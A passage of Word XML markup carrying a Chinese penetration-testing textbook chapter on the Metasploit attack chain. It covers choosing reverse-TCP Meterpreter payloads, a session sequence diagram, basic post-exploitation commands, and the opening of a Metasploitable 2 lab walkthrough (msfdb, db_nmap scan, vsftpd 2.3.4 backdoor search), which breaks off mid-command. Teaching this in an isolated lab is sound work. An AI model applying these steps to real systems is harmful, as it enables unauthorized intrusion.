        <w:t xml:space="preserve">模块。模块能否生效取决于目标服务的精确版本与漏洞覆盖的匹配程度。此阶段的攻击假设是“目标存在可被已有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块覆盖的已知漏洞”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段三：载荷配置与生成（Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——选定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，攻击者需配置与之兼容的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload。决策点包括：选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staged/stageless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷（已在第17.1节讨论）、根据目标操作系统与架构选择合适的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），以及配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等连接参数以建立反向连接。此阶段所违反的防御假设是“网络边界可阻止由内向外的非授权连接”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段四：漏洞触发与会话建立（Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Establishment）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块后，框架将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组合发送至目标。若漏洞存在且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置正确，目标将在触发漏洞后执行载荷，建立起与攻击机的会话连接。该过程的序列图如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant A as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MSF)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant T as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Metasploitable 2)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段四开始</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;T: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（如针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的恶意请求）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over T: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞触发，执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> T--&gt;&gt;A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接（reverse_tcp）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: Meterpreter session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;T: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送后续命令</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> T--&gt;&gt;A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令执行结果返回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1168"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段五：基础后渗透操作（Basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——会话建立后，攻击者通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行信息收集、权限维持准备等基础操作。本节仅演示最常用的后渗透步骤（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等），详细的后渗透与权限维持策略将在第18章展开。此阶段的操作假设是“已获得的会话权限可满足攻击者当前目标需求”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整链路实操：Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全程演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机与搭建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本实操以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为靶机，其搭建步骤请回指第2章。请确保攻击机（Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或已安装</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的系统）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处于同一隔离虚拟网络（如仅主机模式或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网段），且攻击机可正常访问靶机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址。以下所有命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请替换为读者实际环境中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">逐步命令与操作流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：初始扫描与数据库初始化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库服务，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描结果，建立结构化的目标信息库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 在 Kali Linux 终端中启动数据库服务（如未启动）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl start postgresql</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfdb init</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 启动 msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 在 msfconsole 内执行 Nmap 扫描并将结果存入数据库</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象与判读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行完毕后，可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令查看已发现的主机列表，用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令查看开放端口与服务版本信息。扫描输出应显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上经典的开放端口（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 21/tcp vsftpd 2.3.4、22/tcp OpenSSH、80/tcp HTTP Apache、445/tcp Samba </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，具体因靶机版本而异）。若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令返回空结果，说明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未正确执行或数据库连接异常——请检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfdb init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出消息确认数据库状态。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：搜索与选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上经典的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后门漏洞为例，搜索相关模块：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 在 msfconsole 内搜索 vsftpd 相关模块</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
